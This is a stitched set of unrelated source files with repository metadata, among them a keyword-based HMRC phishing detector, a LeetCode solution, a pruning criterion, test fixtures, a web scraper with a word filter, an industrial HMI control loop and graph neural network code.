try:
for entry in forensic_files:
files_info = demisto.getFilePath(id=entry)
with open(files_info["path"], "r") as file_handle:
file_content = file_handle.read()
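        # Added note: the pattern on the next line appears to contain non-ASCII
        # homoglyph characters deliberately, to catch lookalike spellings of
        # "hm revenue & customs" used in phishing mails.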
result = re.findall('hm rеvеnuе & custоms', file_content, re.IGNORECASE)
if len(result):
res = True
result = re.findall('GOV.UK', file_content)
if len(result):
res = True
result1 = re.findall('hmrc', file_content, re.IGNORECASE)
result2 = re.findall('gov.uk', file_content, re.IGNORECASE)
if len(result1) and len(result2):
res = True
result1 = re.findall('tax refund', file_content, re.IGNORECASE)
result2 = re.findall('gov.uk', file_content, re.IGNORECASE)
if len(result1) and len(result2):
res = True
ec = {
"SlashNext.PhishingBrand": "HMRC" if res else "Unknown"
}
ioc_cont = {
"PhishingBrand": "HMRC" if res else "Unknown"
}
md = tableToMarkdown(
"HMRC Targeted Phishing Detection",
ioc_cont,
['PhishingBrand']
)
return_outputs(md, ec, ioc_cont)
except Exception as ex:
return_error("Exception Occurred, {}".format(str(ex)))
| 31.018519 | 98 | 0.574328 |
c7b2d5a4fb3eac88a3d26a6c4c9aa5329f14e65d
| 587 |
py
|
Python
|
leetcode/112-Path-Sum/PathSum_001.py
|
cc13ny/all-in
|
bc0b01e44e121ea68724da16f25f7e24386c53de
|
[
"MIT"
] | 1 |
2015-12-16T04:01:03.000Z
|
2015-12-16T04:01:03.000Z
|
leetcode/112-Path-Sum/PathSum_001.py
|
cc13ny/all-in
|
bc0b01e44e121ea68724da16f25f7e24386c53de
|
[
"MIT"
] | 1 |
2016-02-09T06:00:07.000Z
|
2016-02-09T07:20:13.000Z
|
leetcode/112-Path-Sum/PathSum_001.py
|
cc13ny/all-in
|
bc0b01e44e121ea68724da16f25f7e24386c53de
|
[
"MIT"
] | 2 |
2019-06-27T09:07:26.000Z
|
2019-07-01T04:40:13.000Z
|
# Definition for a binary tree node
# class TreeNode:
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Solution:
# @param root, a tree node
# @param sum, an integer
# @return a boolean
def hasPathSum(self, root, sum):
if root == None:
return False
diff = sum - root.val
if root.left == None and root.right == None and diff == 0:
return True
a = self.hasPathSum(root.left, diff)
b = self.hasPathSum(root.right, diff)
return a or b
| 24.458333 | 66 | 0.551959 |
401bcd08aa8968731ba6ff0041f2bfe2a3b6f581
| 477 |
py
|
Python
|
source/pkgsrc/cad/py-gds/patches/patch-setup.py
|
Scottx86-64/dotfiles-1
|
51004b1e2b032664cce6b553d2052757c286087d
|
[
"Unlicense"
] | 1 |
2021-11-20T22:46:39.000Z
|
2021-11-20T22:46:39.000Z
|
source/pkgsrc/cad/py-gds/patches/patch-setup.py
|
Scottx86-64/dotfiles-1
|
51004b1e2b032664cce6b553d2052757c286087d
|
[
"Unlicense"
] | null | null | null |
source/pkgsrc/cad/py-gds/patches/patch-setup.py
|
Scottx86-64/dotfiles-1
|
51004b1e2b032664cce6b553d2052757c286087d
|
[
"Unlicense"
] | null | null | null |
$NetBSD: patch-setup.py,v 1.2 2020/09/04 16:05:20 mef Exp $
Allow UTF-8 README.md
--- setup.py.orig 2020-05-31 17:53:41.141364832 +0000
+++ setup.py
@@ -12,7 +12,7 @@ import platform
from setuptools import setup, Extension
from distutils.version import LooseVersion
-with open("README.md") as fin:
+with open("README.md", **({'encoding': 'UTF-8'} if sys.version_info.major>=3 else {})) as fin:
long_description = fin.read()
with open("gdspy/__init__.py") as fin:
| 29.8125 | 95 | 0.685535 |
4041c83bb1c3ed61078627345783ddb3a731bfaf
| 3,032 |
py
|
Python
|
test3.py
|
Tiangewang0524/zzu_spider
|
eddd534f6a7bfb39eec5a7e240f830550b2285cb
|
[
"Apache-2.0"
] | null | null | null |
test3.py
|
Tiangewang0524/zzu_spider
|
eddd534f6a7bfb39eec5a7e240f830550b2285cb
|
[
"Apache-2.0"
] | null | null | null |
test3.py
|
Tiangewang0524/zzu_spider
|
eddd534f6a7bfb39eec5a7e240f830550b2285cb
|
[
"Apache-2.0"
] | null | null | null |
import requests
from lxml import etree
import re
import pdfkit
from PyPDF2 import PdfFileMerger
import os
# Sensitive-word filtering class (Aho-Corasick automaton)
import Ac_auto
# pdfkit configuration
confg = pdfkit.configuration(wkhtmltopdf=r'C:\Program Files\wkhtmltopdf\bin\wkhtmltopdf.exe')
# Spoofed HTTP request headers
headers = {
'User-Agent':
'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0;'
}
def get_url_info(url_list):
    # Running count of news items
    sum_i = 0
    # Get the name of the news section
    news_heading = 'Test1'
    # Create the output folder
    # First check whether the folder exists; create it if it does not
    # now_dir = os.getcwd()
    new_dir = 'D:\\PycharmProjects\\zzu_spider' + '\\' + news_heading
dir_judge = os.path.exists(new_dir)
if not dir_judge:
os.mkdir(new_dir)
# print(new_dir)
    # Merge the PDFs
    merger = PdfFileMerger()
    # Process every news item on every page
    for i, url in enumerate(url_list):
        # for j in range(0, 50):
        # Combine the news title and body, store them as a dict
j = 0
r = requests.get(url, headers=headers)
r.encoding = 'UTF-8'
tips = '获取{}栏目下第{}页第{}条新闻,总第{}条新闻......'.format(news_heading, i + 1, j + 1, sum_i + 1)
print(tips)
        # Use tips to locate empty news items that the crawler failed to fetch
try:
raw_html = r.text
print(raw_html)
html_filter = sensitive_word_filter(raw_html)
pdfkit.from_string(raw_html, new_dir + '\\' + tips[2:-6] + '.pdf', configuration=confg)
            # Merge the PDFs
pdf_file = new_dir + '\\' + tips[2:-6] + '.pdf'
merger.append(open(pdf_file, 'rb'))
print(merger)
sum_i += 1
except:
continue
with open('test1111' + '.html', 'w+') as f1:
f1.write(raw_html)
    # Merge the PDFs
merger.write(new_dir + '\\' + '合并test.pdf')
print('{}栏目pdf合并完成'.format(news_heading))
# Fetch the content of a single news item
# def get_url_content(news_url, tips):
# r = requests.get(news_url, headers=headers)
# r.encoding = 'UTF-8'
# sub_html = etree.HTML(r.text)
#     # Clean the content: remove spaces, newlines, escape characters etc., and apply keyword screening
#     # Keyword screening and blocking (keywords: reactionary statements and uncivil language)
# content = sub_html.xpath('//*[@id="bok_0"]/div[@class="zzj_5"]//text()')
# content = ''.join(content)
# content = re.sub(r'\s', '', content)
#
# # print(content)
# content = sensitive_word_filter(content)
#
#     # If the content comes back empty, record the exact failing news position and write it to a txt file
# if content == '':
# with open('C:/Users/mcgra/Desktop/spider_error.txt', 'a+') as f1:
# f1.write(tips)
# f1.write('\n')
#
# return content
# Sensitive word filtering
def sensitive_word_filter(content):
ah = Ac_auto.ac_automation()
path = 'sensitive_words.txt'
ah.parse(path)
content = ah.words_replace(content)
# text1 = "新疆骚乱苹果新品发布会"
# text2 = ah.words_replace(text1)
# print(text1)
# print(text2)
return content
def main():
    # All the section links of the Zhengzhou University news site
# all_urls = all_urls_list()
# for url in all_urls:
# url_list = get_url_list(url)
url = ['http://news.zzu.edu.cn/', 'http://www16.zzu.edu.cn/msgs/vmsgisapi.dll/vmsglist?mtype=x&lan=203']
get_url_info(url)
if __name__ == '__main__':
main()
| 26.365217 | 108 | 0.592678 |
40e689f3bf0f871bc6b25864ef1919cb2cf0d5a0
| 4,665 |
py
|
Python
|
models/criterions/CROPStructured.py
|
scott-mao/CroP
|
f1e0a25224e341683cf47e7ce451ce0fe996e950
|
[
"MIT"
] | null | null | null |
models/criterions/CROPStructured.py
|
scott-mao/CroP
|
f1e0a25224e341683cf47e7ce451ce0fe996e950
|
[
"MIT"
] | null | null | null |
models/criterions/CROPStructured.py
|
scott-mao/CroP
|
f1e0a25224e341683cf47e7ce451ce0fe996e950
|
[
"MIT"
] | 1 |
2021-11-08T16:34:45.000Z
|
2021-11-08T16:34:45.000Z
|
import copy
import torch
import torch.autograd as autograd
import torch.nn as nn
import torch.nn.functional as F
from models.criterions.SNAP import SNAP
from utils.constants import SNIP_BATCH_ITERATIONS
from collections import OrderedDict
from tqdm import tqdm
from models.networks.ResNext import ResNext
class CROPStructured(SNAP):
def __init__(self, *args, **kwargs):
super(CROPStructured, self).__init__(*args, **kwargs)
def get_prune_indices(self, *args, **kwargs):
raise NotImplementedError
def get_grow_indices(self, *args, **kwargs):
raise NotImplementedError
def get_weight_saliencies(self, train_loader):
# copy network
self.model = self.model.cpu()
net = copy.deepcopy(self.model)
net = net.to(self.device)
net = net.eval()
# insert c to gather elasticities
self.insert_governing_variables(net)
iterations = SNIP_BATCH_ITERATIONS
if isinstance(self.model, ResNext):
iterations = 2
device = self.device
self.their_implementation(device, iterations, net, train_loader)
# gather elasticities
grads_abs = OrderedDict()
grads_abs2 = OrderedDict()
for name, layer in net.named_modules():
if "Norm" in str(layer): continue
name_ = f"{name}.weight"
if hasattr(layer, "gov_in"):
for (identification, param) in [(id(param), param) for param in [layer.gov_in, layer.gov_out] if
param.requires_grad]:
try:
grad_ab = torch.abs(param.grad.data)
except:
grad_ab = torch.zeros_like(param.data)
grads_abs2[(identification, name_)] = grad_ab
if identification not in grads_abs:
grads_abs[identification] = grad_ab
# reset model
net = net.cpu()
del net
self.model = self.model.to(self.device)
self.model = self.model.train()
all_scores = torch.cat([torch.flatten(x) for _, x in grads_abs.items()])
norm_factor = 1
all_scores.div_(norm_factor)
log10 = all_scores.sort().values.log10()
return all_scores, grads_abs2, log10, norm_factor, [x.shape[0] for x in grads_abs.values()]
def their_implementation(self, device, iterations, net, train_loader):
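        # Added interpretation (editor's sketch, not from the original source): grad_w
        # accumulates plain loss gradients over a few batches; grad_f is recomputed with
        # create_graph=True, so z = sum(grad_w * grad_f * mask) and z.backward() deposit a
        # Hessian-gradient-product signal (a GraSP-style saliency) into the governing
        # variables that gate each structured unit.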
net.zero_grad()
weights = []
for layer in net.modules():
if isinstance(layer, nn.Conv2d) or isinstance(layer, nn.Linear):
weights.append(layer.weight)
inputs_one = []
targets_one = []
grad_w = None
grad_f = None
for w in weights:
w.requires_grad_(True)
dataloader_iter = iter(train_loader)
for it in tqdm(range(iterations)):
inputs, targets = next(dataloader_iter)
N = inputs.shape[0]
din = copy.deepcopy(inputs)
dtarget = copy.deepcopy(targets)
start = 0
intv = N
while start < N:
end = min(start + intv, N)
inputs_one.append(din[start:end])
targets_one.append(dtarget[start:end])
outputs = net.forward(inputs[start:end].to(device)) # divide by temperature to make it uniform
loss = F.cross_entropy(outputs, targets[start:end].to(device))
grad_w_p = autograd.grad(loss, weights, create_graph=False)
if grad_w is None:
grad_w = list(grad_w_p)
else:
for idx in range(len(grad_w)):
grad_w[idx] += grad_w_p[idx]
start = end
for it in tqdm(range(len(inputs_one))):
inputs = inputs_one.pop(0).to(device)
targets = targets_one.pop(0).to(device)
outputs = net.forward(inputs) # divide by temperature to make it uniform
loss = F.cross_entropy(outputs, targets)
grad_f = autograd.grad(loss, weights, create_graph=True)
z = 0
count = 0
for name, layer in net.named_modules():
if isinstance(layer, nn.Conv2d) or isinstance(layer, nn.Linear):
if grad_w[count].is_cuda:
z += (grad_w[count] * grad_f[count] * self.model.mask[name + ".weight"]).sum()
else:
z += (grad_w[count] * grad_f[count] * self.model.mask[name + ".weight"].cpu()).sum()
count += 1
z.backward()
| 38.553719 | 112 | 0.568489 |
734c2b5ae2abdc64ff9839fcb7fbe0ab5e183499
| 2,386 |
py
|
Python
|
tests/onegov/translator_directory/conftest.py
|
politbuero-kampagnen/onegov-cloud
|
20148bf321b71f617b64376fe7249b2b9b9c4aa9
|
[
"MIT"
] | null | null | null |
tests/onegov/translator_directory/conftest.py
|
politbuero-kampagnen/onegov-cloud
|
20148bf321b71f617b64376fe7249b2b9b9c4aa9
|
[
"MIT"
] | null | null | null |
tests/onegov/translator_directory/conftest.py
|
politbuero-kampagnen/onegov-cloud
|
20148bf321b71f617b64376fe7249b2b9b9c4aa9
|
[
"MIT"
] | null | null | null |
import pytest
import transaction
from onegov.fsi.initial_content import create_new_organisation
from onegov.translator_directory import TranslatorDirectoryApp
from onegov.user import User
from sqlalchemy.orm.session import close_all_sessions
from tests.onegov.fsi.common import global_password
from tests.onegov.fsi.common import hashed_password as _hashed_password
from tests.shared import Client as BaseClient
from tests.shared.utils import create_app
class Client(BaseClient):
use_intercooler = True
skip_first_form = True
def login_member(self, to=None):
return self.login('[email protected]', global_password, to)
@pytest.fixture(scope='session')
def plain_password():
return global_password
@pytest.fixture(scope='session')
def hashed_password():
return _hashed_password
@pytest.fixture(scope='function')
def translator_app(request, hashed_password):
yield create_translator_app(request, False, hashed_password)
@pytest.fixture(scope='function')
def es_translator_app(request, hashed_password):
yield create_translator_app(request, True, hashed_password)
@pytest.fixture(scope='function')
def client(translator_app):
return Client(translator_app)
@pytest.fixture(scope='function')
def client_with_es(es_translator_app):
return Client(es_translator_app)
def create_translator_app(request, use_elasticsearch, hashed_password):
app = create_app(
app_class=TranslatorDirectoryApp,
request=request,
use_elasticsearch=use_elasticsearch
)
session = app.session()
org = create_new_organisation(app, name="Übersetzerverzeichnis")
org.meta['reply_to'] = '[email protected]'
org.meta['locales'] = 'de_CH'
# usually we don't want to create the users directly, anywhere else you
# *need* to go through the UserCollection. Here however, we can improve
# the test speed by not hashing the password for every test.
session.add(User(
username='[email protected]',
password_hash=hashed_password,
role='admin'
))
session.add(User(
username='[email protected]',
password_hash=hashed_password,
role='editor'
))
session.add(User(
username='[email protected]',
password_hash=hashed_password,
role='member'
))
transaction.commit()
close_all_sessions()
return app
| 25.934783 | 75 | 0.738894 |
488ad88797574037e51f67373c4e4268ce37fac8
| 1,749 |
py
|
Python
|
python/crossref_prefix.py
|
sma-h/openapc-de
|
0ec2d42d525219d801f71538f5b30ca6fecd9d3a
|
[
"Cube"
] | 89 |
2015-02-13T13:46:06.000Z
|
2022-03-13T16:42:44.000Z
|
python/crossref_prefix.py
|
sma-h/openapc-de
|
0ec2d42d525219d801f71538f5b30ca6fecd9d3a
|
[
"Cube"
] | 91 |
2015-03-12T13:31:36.000Z
|
2022-01-14T07:37:37.000Z
|
python/crossref_prefix.py
|
sma-h/openapc-de
|
0ec2d42d525219d801f71538f5b30ca6fecd9d3a
|
[
"Cube"
] | 138 |
2015-03-04T15:23:43.000Z
|
2022-03-09T15:11:52.000Z
|
#!/usr/bin/env python3
# -*- coding: UTF-8 -*-
import argparse
import csv
import os
from urllib.request import urlopen, Request
from urllib.error import HTTPError, URLError
import xml.etree.ElementTree as ET
import openapc_toolkit as oat
def get_prefix(doi):
url = 'http://data.crossref.org/' + doi
req = Request(url)
req.add_header("Accept", "application/vnd.crossref.unixsd+xml")
try:
response = urlopen(req)
content_string = response.read()
root = ET.fromstring(content_string)
result = root.findall(".//cr_qr:crm-item[@name='prefix-name']", {"cr_qr": "http://www.crossref.org/qrschema/3.0"})
return result[0].text
except HTTPError as httpe:
code = str(httpe.getcode())
return "HTTPError: {} - {}".format(code, httpe.reason)
except URLError as urle:
return "URLError: {}".format(urle.reason)
except ET.ParseError as etpe:
return "ElementTree ParseError: {}".format(str(etpe))
parser = argparse.ArgumentParser()
parser.add_argument("doi_or_file", help="An OpenAPC-compatible CSV file or a single DOI to look up in crossref.")
args = parser.parse_args()
arg = args.doi_or_file
if os.path.isfile(arg):
csv_file = open(arg, "r", encoding="utf8")
reader = csv.reader(csv_file)
line_number = 0
for line in reader:
if not line:
prefix = ""
else:
prefix = get_prefix(line[3])
result = str(line_number) + ": " + prefix
if prefix == "Springer (Biomed Central Ltd.)":
oat.print_g(result)
elif prefix == "Nature Publishing Group":
oat.print_r(result)
else:
print(result)
line_number += 1
else:
print(get_prefix(arg))
| 31.8 | 122 | 0.635792 |
81912187703995cb49b326d91df0a6435766b901
| 470 |
py
|
Python
|
stock_tushare/com/aaron/app.py
|
qsunny/python
|
ace8c3178a9a9619de2b60ca242c2079dd2f825e
|
[
"MIT"
] | null | null | null |
stock_tushare/com/aaron/app.py
|
qsunny/python
|
ace8c3178a9a9619de2b60ca242c2079dd2f825e
|
[
"MIT"
] | 2 |
2021-03-25T22:00:07.000Z
|
2022-01-20T15:51:48.000Z
|
stock_tushare/com/aaron/app.py
|
qsunny/python
|
ace8c3178a9a9619de2b60ca242c2079dd2f825e
|
[
"MIT"
] | null | null | null |
import tushare as ts
token = '19c3a898e510a566d1bed1df579407af9bdf9bf0c3255f1eac99c05b';
if __name__ == "__main__":
print(ts.__version__)
ts.set_token(token)
pro = ts.pro_api()
# df = pro.trade_cal(exchange='', start_date='20200701', end_date='20200723',
# fields='exchange,cal_date,is_open,pretrade_date', is_open='0')
df = pro.query('daily', ts_code='600522.SH', start_date='20200701', end_date='20200723')
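    # Added note (assumes a valid tushare token): pro.query('daily', ...) should return a
    # pandas DataFrame of daily bars (open/high/low/close, volume, etc.) for 600522.SH
    # in the requested date window.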
print(df)
| 31.333333 | 92 | 0.678723 |
c48cda6a9ab75b8816320908941c4bac1a51d758
| 6,437 |
py
|
Python
|
Praxisseminar/hmi.py
|
EnjoyFitness92/Praxisseminar-SS2020
|
b5baba5d1512a5fad3391efc42f3ab232d79c4e2
|
[
"MIT"
] | null | null | null |
Praxisseminar/hmi.py
|
EnjoyFitness92/Praxisseminar-SS2020
|
b5baba5d1512a5fad3391efc42f3ab232d79c4e2
|
[
"MIT"
] | 2 |
2020-06-24T13:01:22.000Z
|
2020-06-24T13:10:07.000Z
|
Praxisseminar/hmi.py
|
EnjoyFitness92/Praxisseminar-SS2020
|
b5baba5d1512a5fad3391efc42f3ab232d79c4e2
|
[
"MIT"
] | null | null | null |
"""
WORK IN PROGRESS
Last updated 06.07.: added HMI protocol data
Praxisseminar hmi.py
"""
from minicps.devices import HMI
from utils import Praxisseminar_test_logger
from utils import STATE, PLC1_ADDR
from utils import HMI_PROTOCOL, HMI_DATA, HMI_ADDR
import time
MOTOR = ('MOTOR', 1)
SENSOR = ('SENSOR', 1)
class PHMI(HMI):
"""Praxisseminar HMI.
HMI:
    - The motor data can be read from the PLC
    - The PLC can be operated (switch on/off + change the speed)
"""
def main_loop(self, sleep=10):
"""HMI main
"""
while True:
Praxisseminar_test_logger.debug("Die HMI mit Adresse " + str(HMI_ADDR) + " befindet sich in der main loop")
print "Sie haben folgende Optionen: "
print
eingabe = int(raw_input("Auslesen Status: Taste 1/ Geschwindigkeit einstellen: Taste 2/ Ein-/Ausschalten: Taste 3/ Programm beenden: Taste 99 "))
print 'DEBUG: eingabe = %s' % eingabe
Praxisseminar_test_logger.debug("Der User hat folgendes eingegeben: %s" % str(eingabe))
            # Query the motor status
if eingabe == 1:
Praxisseminar_test_logger.debug("User befindet sich in der ersten if-Abfrage")
motor = self.receive(MOTOR, PLC1_ADDR)
print "DEBUG plc1 erhaelt motor: " + motor
Praxisseminar_test_logger.info('Motor erhaelt von PLC1_ADDR: ' + motor)
if motor == '1':
print 'DEBUG plc1 motor: An'
Praxisseminar_test_logger.info("Der Motor ist An")
elif motor == '0':
print 'DEBUG plc1 motor: Aus'
Praxisseminar_test_logger.info("Der Motor ist Aus")
            # Set the speed
elif eingabe == 2:
Praxisseminar_test_logger.debug("User befindet sich in der zweiten if-Abfrage")
motor = self.receive(MOTOR, PLC1_ADDR)
print "DEBUG plc1 erhaelt motor: " + motor
Praxisseminar_test_logger.info('Motor erhaelt von PLC1_ADDR: ' + motor)
                # see input option '1'
if motor == '1':
Praxisseminar_test_logger.info("Der Motor ist an")
sensor = self.receive(SENSOR, PLC1_ADDR)
print 'DEBUG plc1 motor: An mit der Geschwindigkeit' + sensor
Praxisseminar_test_logger.info('Sensor erhaelt von PLC1_ADDR: ' + sensor)
                    # Ask whether the speed should be changed and what the new speed should be (adjust the allowed speed range as needed)
change = raw_input("Wollen Sie die Geschwindigkeit veraendern? J/N")
Praxisseminar_test_logger.debug("Der User hat folgendes eingegeben: %s" % change)
if change == "J" or change == "j":
new_vel = float(raw_input("Geben Sie die neue Geschwindigkeit ein: "))
Praxisseminar_test_logger.debug("Der User hat folgendes eingegeben: %s" % str(new_vel))
self.send(SENSOR, new_vel, PLC1_ADDR)
print 'DEBUG plc1 motor: An mit neuer Geschwindigkeit' + str(new_vel)
Praxisseminar_test_logger.info('HMI sendet folgende SENSOR-Daten an PLC1_ADDR: ' + str(new_vel))
elif change == "N" or change == "n":
Praxisseminar_test_logger.debug("Elif-Abfrage wurde erreicht weil User ein N/n eingegeben hat")
continue
elif motor == '0':
print 'DEBUG plc1 motor: Aus'
Praxisseminar_test_logger.info("Der Motor ist aus")
print
            # Switch the motor on or off
elif eingabe == 3:
Praxisseminar_test_logger.debug("User befindet sich in der dritten if-Abfrage")
motor = self.receive(MOTOR, PLC1_ADDR)
print "DEBUG plc1 erhaelt motor: " + motor
Praxisseminar_test_logger.debug('Motor erhaelt von PLC1_ADDR: ' + motor)
if motor == '1':
Praxisseminar_test_logger.info("Der Motor ist an")
onoff = int(raw_input("Wollen Sie den Motor auschalten? Bitte geben Sie 0 ein ansonsten 1"))
Praxisseminar_test_logger.debug("Der User hat folgendes eingegeben: %s" % str(onoff))
if onoff == 0:
self.send(MOTOR, onoff, PLC1_ADDR)
Praxisseminar_test_logger.info('HMI sendet folgende MOTOR-Daten an PLC1_ADDR: ' + str(onoff))
self.send(SENSOR, 0.0, PLC1_ADDR)
Praxisseminar_test_logger.info('HMI sendet folgende SENSOR-Daten an PLC1_ADDR: ' + str(0.0))
Praxisseminar_test_logger.debug('Da der Motor ausgeschaltet wurde wird die Geschwindigkeit des Foerderbandes auf 0.0 zurueckgesetzt')
elif onoff == 1:
self.send(MOTOR, onoff, PLC1_ADDR)
Praxisseminar_test_logger.info('HMI sendet folgende MOTOR-Daten an PLC1_ADDR: ' + str(onoff))
elif motor == '0':
Praxisseminar_test_logger.info("Der Motor ist aus")
onoff = int(raw_input("Wollen Sie den Motor einschalten? Bitte geben Sie 1 ein ansonsten 0"))
Praxisseminar_test_logger.debug("Der User hat folgendes eingegeben: %s" % str(onoff))
if onoff == 0:
self.send(MOTOR, onoff, PLC1_ADDR)
Praxisseminar_test_logger.info('HMI sendet folgende MOTOR-Daten an PLC1_ADDR: ' + str(onoff))
elif onoff == 1:
self.send(MOTOR, onoff, PLC1_ADDR)
Praxisseminar_test_logger.info('HMI sendet folgende MOTOR-Daten an PLC1_ADDR: ' + str(onoff))
elif eingabe == 99:
print 'DEBUG: HMI Shutdown'
Praxisseminar_test_logger.debug('DEBUG: HMI Shutdown')
break
time.sleep(sleep)
if __name__ == "__main__":
    # notice that memory init is different from disk init
phmi = PHMI(
name='phmi',
state=STATE,
protocol=HMI_PROTOCOL,
memory=HMI_DATA,
disk=HMI_DATA)
| 42.629139 | 157 | 0.57822 |
6ffef31ee2bd6fb24ea4b186bbdce561fbfde897
| 3,262 |
py
|
Python
|
research/gnn/dgcn/src/dgcn.py
|
leelige/mindspore
|
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
|
[
"Apache-2.0"
] | 77 |
2021-10-15T08:32:37.000Z
|
2022-03-30T13:09:11.000Z
|
research/gnn/dgcn/src/dgcn.py
|
leelige/mindspore
|
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
|
[
"Apache-2.0"
] | 3 |
2021-10-30T14:44:57.000Z
|
2022-02-14T06:57:57.000Z
|
research/gnn/dgcn/src/dgcn.py
|
leelige/mindspore
|
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
|
[
"Apache-2.0"
] | 24 |
2021-10-15T08:32:45.000Z
|
2022-03-24T18:45:20.000Z
|
# Copyright 2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""DGCN Network."""
import numpy as np
from mindspore import nn
from mindspore.ops import operations as P
from mindspore import Tensor
from mindspore.nn.layer.activation import get_activation
def glorot(shape):
"""Randomly generated weight."""
W = np.asarray(
np.random.RandomState(1234).uniform(
low=-np.sqrt(6. / (shape[0]+shape[1])),
high=np.sqrt(6. / (shape[0]+shape[1])),
size=(shape[0], shape[1])
), dtype=np.float32)
return Tensor(W)
class GraphConvolution(nn.Cell):
"""Graph convolutional layer."""
def __init__(self,
feature_in_dim,
feature_out_dim,
dropout_ratio=None,
activation=None,
):
super(GraphConvolution, self).__init__()
self.in_dim = feature_in_dim
self.out_dim = feature_out_dim
self.weight_init = glorot([self.out_dim, self.in_dim])
self.fc = nn.Dense(self.in_dim,
self.out_dim,
weight_init=self.weight_init,
has_bias=False)
self.dropout_flag = False
self.dropout_ratio = dropout_ratio
if self.dropout_ratio is not None:
self.dropout_flag = self.dropout_ratio
self.dropout = nn.Dropout(keep_prob=1-self.dropout_ratio)
self.activation = get_activation(activation)
self.activation_flag = self.activation is not None
self.matmul = P.MatMul()
def construct(self, adj, input_feature):
"""Convolutional operations."""
dropout = input_feature
if self.dropout_flag:
dropout = self.dropout(dropout)
fc = self.fc(dropout)
output_feature = self.matmul(adj, fc)
if self.activation_flag:
output_feature = self.activation(output_feature)
return output_feature
class DGCN(nn.Cell):
"""Generate DGCN model."""
def __init__(self, input_dim, hidden_dim, output_dim, dropout):
super(DGCN, self).__init__()
self.layer0 = GraphConvolution(input_dim, hidden_dim, activation='relu', dropout_ratio=dropout)
self.layer1 = GraphConvolution(hidden_dim, output_dim, dropout_ratio=dropout)
def construct(self, adj, ppmi, feature):
Softmax = nn.Softmax()
diffoutput0 = self.layer0(adj, feature)
diffoutput1 = Softmax(self.layer1(adj, diffoutput0))
ppmioutput0 = self.layer0(ppmi, feature)
ppmioutput1 = Softmax(self.layer1(ppmi, ppmioutput0))
return diffoutput1, ppmioutput1
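# --- Usage sketch (added; not part of the original module) ---
# Minimal smoke test for the cells above. The graph size, feature width and class count
# are made-up placeholders; adj/ppmi are assumed to be dense, already-normalized float32
# matrices of shape [n_nodes, n_nodes], and a MindSpore version compatible with the
# nn.Dropout(keep_prob=...) API used above is assumed.
if __name__ == '__main__':
    n_nodes, n_feat, n_class = 5, 8, 3
    adj = Tensor(np.eye(n_nodes, dtype=np.float32))        # placeholder adjacency matrix
    ppmi = Tensor(np.eye(n_nodes, dtype=np.float32))       # placeholder PPMI matrix
    feature = Tensor(np.random.rand(n_nodes, n_feat).astype(np.float32))
    model = DGCN(input_dim=n_feat, hidden_dim=16, output_dim=n_class, dropout=0.5)
    diff_out, ppmi_out = model(adj, ppmi, feature)         # each output is [n_nodes, n_class]
    print(diff_out.shape, ppmi_out.shape)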
| 37.494253 | 103 | 0.634273 |
73ca152e00ed8e1d2f0d4030182a44e93bce502f
| 588 |
py
|
Python
|
examples/basic/session.py
|
j-helland/warp
|
2a71346f0ec4d4e6fd45ed3b5e972b683724287c
|
[
"Unlicense"
] | null | null | null |
examples/basic/session.py
|
j-helland/warp
|
2a71346f0ec4d4e6fd45ed3b5e972b683724287c
|
[
"Unlicense"
] | null | null | null |
examples/basic/session.py
|
j-helland/warp
|
2a71346f0ec4d4e6fd45ed3b5e972b683724287c
|
[
"Unlicense"
] | null | null | null |
from warp import Graph, Workspace
from warp.globals import register_graph
from warp.constants import WARP_LOGO
from warp import log
from example import A, B, C, D
@register_graph('build-graph-example')
def build_graph() -> Graph:
return Graph() @ A + B + C + D
### Header
print(WARP_LOGO)
### Info
ws = Workspace(graph='build-graph-example')
log.info('Your workspace is now loaded as `ws`.')
log.info(f'Cache directory: {ws.home.path}/{ws.home.session_id}')
log.info('Do `ws.methods` to see available commands. Do `help(ws.[METHOD NAME])` for further information.')
print()
| 25.565217 | 107 | 0.717687 |
fb943851be8a90d70d11431fe85dba6b4110fcac
| 392 |
py
|
Python
|
backend/apps/ineedstudent/migrations/0002_hospital_max_mails_per_day.py
|
n-hackert/match4healthcare
|
761248c27b49e568c545c643a72eac9a040649d7
|
[
"MIT"
] | 2 |
2020-03-28T13:56:39.000Z
|
2020-03-29T10:16:12.000Z
|
backend/apps/ineedstudent/migrations/0002_hospital_max_mails_per_day.py
|
n-hackert/match4healthcare
|
761248c27b49e568c545c643a72eac9a040649d7
|
[
"MIT"
] | 76 |
2020-03-27T21:53:04.000Z
|
2020-03-30T20:27:43.000Z
|
backend/apps/ineedstudent/migrations/0002_hospital_max_mails_per_day.py
|
n-hackert/match4healthcare
|
761248c27b49e568c545c643a72eac9a040649d7
|
[
"MIT"
] | null | null | null |
# Generated by Django 3.0.4 on 2020-03-29 20:23
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('ineedstudent', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='hospital',
name='max_mails_per_day',
field=models.IntegerField(default=200),
),
]
| 20.631579 | 51 | 0.604592 |
5439d4d85434223c03b87f557e495f96b59f51db
| 12,273 |
py
|
Python
|
item_recommender.py
|
xrb92/R3S
|
bc39fd90bb3f3cec195d69bebce61e7cd91243df
|
[
"Apache-2.0"
] | 1 |
2022-02-17T12:28:38.000Z
|
2022-02-17T12:28:38.000Z
|
item_recommender.py
|
xrb92/R3S
|
bc39fd90bb3f3cec195d69bebce61e7cd91243df
|
[
"Apache-2.0"
] | null | null | null |
item_recommender.py
|
xrb92/R3S
|
bc39fd90bb3f3cec195d69bebce61e7cd91243df
|
[
"Apache-2.0"
] | null | null | null |
'''
Item Recommender
April 2021
[email protected]
'''
import os
import sys
import math
import datetime
import numpy as np
import tensorflow as tf
from layer_util import *
from data_reader import DataReader
from hyper_param import param_dict as pd
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
tf.compat.v1.disable_eager_execution()
###### global variable for local computation ######
g_loss_sum = 0.
g_loss_cnt = 0
g_working_mode = 'local_train'
g_training = False
g_dr = DataReader(pd['batch_size'])
